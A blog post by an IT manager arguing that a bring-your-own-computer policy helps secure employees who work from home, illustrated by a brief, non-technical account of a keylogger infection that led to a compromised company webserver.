A couple of months ago, I wrote on allowing employees to bring their own computer to work, instead of using company provided hardware, and part of my article was featured on I-CIO.
Recently, I had an interesting chat with a fellow manager about security, which lead me to the conclusion that a proper BYOC policy can actually be a very important part of global security management.
The company’s global work policy includes a “work from home” policy that allows employees to work part of the week from home, if they agree to play by the rules, which are properly documented and need to be accepted in written by the employee before being applied. I think that being able to work from home is something every company should make possible for their employees nowadays, especially in IT firms. Fast, cheap and reliable broadband connections are available in most EU countries, VPN connections are a standard fitout in most companies’ IT infrastructure, and from an ecological point of view, it makes more sense than ever before to save some fuel and CO2 emission by not driving to your workplace every day. This is without speaking about the motivation increase this provides, as people can more easily combine their professional and personal lives.
So, one day, one of the employees who is used to work from home regularly, had the very bad luck of getting his home PC infected by some kind of keylogger that was silently transmitting FTP access details to some obscure servers in China, which in turn used these credentials to infect script files on a webserver, which in their turn were aimed at infecting even more PC’s of the website’s visitors by installing the keylogger through a cross-site scripting and browser vulnerability exploit technique. Very bad for the employee, and for the company. The issue was quickly identified and cured – gladfully.
Talking about the BYOC idea with the employee’s manager made him tell me : “Well look, that’s what happens with strange ideas like yours about ‘bring your own computer to work’ and so …”. I couldn’t do but disagree respectfully, but firmly. First of all, this wasn’t at all a case of bring your own computer to work, as the employee was using his own hardware at home, but not at the office. It was more a problem about the IT security concept of the company. On the opposite, had the company applied a proper BYOC policy, the employee’s computer would have been fully integrated into the company’s security process, and it would have been equipped with proper and up-to-date antivirus software, for instance.
My conclusion is that “work from home” actually works best if combined with “bring your own computer to work”, because it allows the security processes to be applied not only to the extent of the computers inside the company, but also to the hardware used outside of the company, for company purposes. One approach would be to require employees wanting to work from home, to also bring their hardware to their office workplace (works a bit less well with desktop computers, I have to agree). This allows the company IT security processes to be applied, security and reporting software to be installed, and a pro-active security aura to shine well beyond the office walls. For the employee, this comes at the cost of opening up their personal gear to the eyes of the company IT security team, of course. Then again, no one is forced to work from home. If you want to take advantage of working from your comfy home, you have to give something in return.
Of course, in the end of the day, none of this works if your employees don’t have the right mindset, or if you haven’t educated them responsibly. The most complete and secure policies are useless if they’re not understood in their global impact, or if they are not easy to apply on a daily basis.
What do you think? Please share your views, I promise I’ll reply to every comment.